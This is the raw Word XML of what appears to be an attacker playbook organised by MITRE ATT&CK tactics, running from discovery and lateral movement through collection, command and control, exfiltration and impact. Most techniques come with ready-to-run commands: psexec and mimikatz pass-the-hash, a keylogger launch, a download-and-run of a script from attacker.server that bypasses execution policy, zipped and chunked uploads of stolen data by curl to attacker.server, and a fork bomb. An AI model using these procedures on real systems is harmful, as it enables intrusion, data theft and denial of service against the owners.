    <w:p w14:paraId="262BC6E6" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>net user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787A28B0" w14:textId="625EA4C9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2: T1046 – Network Service Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0177DE8E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Scan for active hosts and listening services.</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA18F60" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>nmap -sV 192.168.1.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47065302" w14:textId="541ECD05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3: T1018 – Remote System Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AB3FC7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Identify networked computers and shares.</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBA9D25" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>net view /domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2B64D7" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>net group /domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C86220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10.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Lateral Movement (TA0008)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774A2713" w14:textId="77777777" w:rsidR="001137E2" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Goal:</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:t xml:space="preserve"> Move from one compromised system to others in the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F72975" w14:textId="04D194E7" w:rsidR="007A5D49" w:rsidRPr="001137E2" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>Technique 1: T1021.001 – Remote Desktop Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FE4EFC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 RDP for lateral access.</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B28FF74" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>powershell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2261A7E4" w14:textId="77777777" w:rsidR="001137E2" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A5D49">
        <w:t>mstsc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A5D49">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A5D49">
        <w:t>v:target</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A5D49">
        <w:t>_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="34D15501" w14:textId="1772A7E1" w:rsidR="007A5D49" w:rsidRPr="001137E2" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>Technique 2: T1076 – Remote Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB6C52D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 admin tools for remote execution.</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B749EE" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>psexec \\target_ip -u user -p password cmd.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9C0F98" w14:textId="058BB483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3: T1550.002 – Pass the Hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470F15C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Authenticate as a user with only the password hash.</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C37226" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>sekurlsa::pth /user:Admin /domain:corp /ntlm:&lt;HASH&gt; /run:cmd.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFEE322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11.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Collection (TA0009)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095C8C8F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Gather target data for exfiltration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E891182" w14:textId="0B2C07EE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1: T1114 – Email Collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B716D9D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Extract emails from victim accounts.</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3986DB28" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>Export Outlook PST file or programmatically download mailbox contents via script (or IMAP credentials with Python).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05924D13" w14:textId="2C2A0FE2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2: T1213 – Data from Information Repositories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A38693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Access files or databases to copy sensitive data.</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146EA9D8" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>SQL DB dump:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74768148" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014AA1BE" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:t xml:space="preserve"> * </w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:t xml:space="preserve"> sensitive_table;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272BAFCC" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>Copy files from a network share:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5203DA4F" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>powershell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DAECB0" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>Copy-Item \\target\share\*.docx C:\temp\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B71853" w14:textId="53192BFE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3: T1056 – Input Capture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682CC95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Log user keystrokes and other inputs.</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193520B8" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>Install custom keylogger malware:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263504F8" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>powershell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0C5491" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># Example install command (depends on specific malware)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03151A8B" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>Start-Process "C:\Users\User\Downloads\keylogger.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA7EE22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12.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Command and Control (TA0011)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54676B90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Maintain a reliable communication channel to compromised machines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9662A9" w14:textId="07B991BC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T1071.001 – Web Protocols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A539DBA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 HTTP/HTTPS for controlling hosts, blending with web traffic.</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D6A21E" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>Malware beacons by sending POST requests to C2 server over HTTPS at intervals:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79161F8D" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C56F70" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># Python sample (attacker-side listener)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11510869" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:t xml:space="preserve"> http.server </w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:t xml:space="preserve"> BaseHTTPRequestHandler, HTTPServer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBC6D1F" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:t xml:space="preserve"> Handler(BaseHTTPRequestHandler):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B33B52" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>def</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:t xml:space="preserve"> do_POST(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF77268" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># process incoming data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78ECF3C4" w14:textId="75188055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T1105 – Ingress Tool Transfer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3550AD4D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Transfer additional tools to compromised hosts.</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731529A1" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>powershell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEAEA58" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>Invoke-WebRequest http://attacker.server/tool.ps1 -OutFile tool.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082CF855" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>powershell -ExecutionPolicy Bypass -File tool.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403F777F" w14:textId="4A1A987C" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>Technique 3: T1573 – Encrypted Channel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD819D4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Encrypt C2 traffic to evade network defenders.</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4663B9EC" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>Set up SSL/TLS tunnels or use Cobalt Strike HTTPS C2 listener.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE07FC0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13.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Exfiltration (TA0010)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1191F3F8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Safely remove sensitive data from the victim environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27493774" w14:textId="7958A9CE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T1041 – Exfiltration Over C2 Channel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE1261F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Send data through established attack communication channels.</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8049F4" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>Compress data and upload via HTTPS POST:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA1F58C" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>powershell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3255E8E2" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>Compress-Archive -Path C:\</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:t>\* -DestinationPath C:\exfil.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D3E4AB" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>Invoke-WebRequest -Uri https://attacker.server/exfil -Method POST -InFile C:\exfil.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF8414B" w14:textId="59773F17" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs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T1002 – Data Encrypted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EDDDE6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Encrypt data before extraction to prevent discovery.</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D667993" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>AES encryption with openssl:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F52DF03" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>openssl enc -aes-256-cbc -salt -in data.txt -out data.enc -k YourSecretPass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49422B10" w14:textId="4EBC4DEA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T1030 – Data Transfer Size Limits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7AEEC4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Exfiltrate small files/pieces to avoid detection.</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29268289" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>Split archive in chunks before upload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456A977D" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>split -b 2M data.enc part_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25426875" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:t xml:space="preserve"> f </w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:t xml:space="preserve"> part_*; </w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>do</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAE265E" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t xml:space="preserve">  curl -X POST -F "file=@$f" https://attacker.server/upload; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5702EA7E" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EAD7D7" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="001137E2" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pP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14. </w:t>
      </w:r>
      <w:r w:rsidRPr="001137E2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="001137E2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tactic: Impact (TA0040)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D671472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Disrupt, destroy, or otherwise negatively affect target data or systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36881BE0" w14:textId="63811C4D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1: T1486 – Data Encrypted for Impact (Ransomware)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA23EA3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Encrypt files, demand ransom for decryption key.</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5149BA05" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>Ransomware payload encrypts files and leaves ransom note after execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1472449C" w14:textId="6BCCE1CE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>Technique 2: T1499.001 – Endpoint Denial of Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBED2A2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Overload or crash systems/devices.</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A3995E" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143FA98E" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># Linux fork bomb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6958708B" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>:(){ :|:&amp; };:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E27B09" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># Windows infinite process spawning (PowerShell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B96C963" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>while($true){Start-Process notepad.exe}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B88886" w14:textId="2DFF8603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b/>
          <w:bCs/>
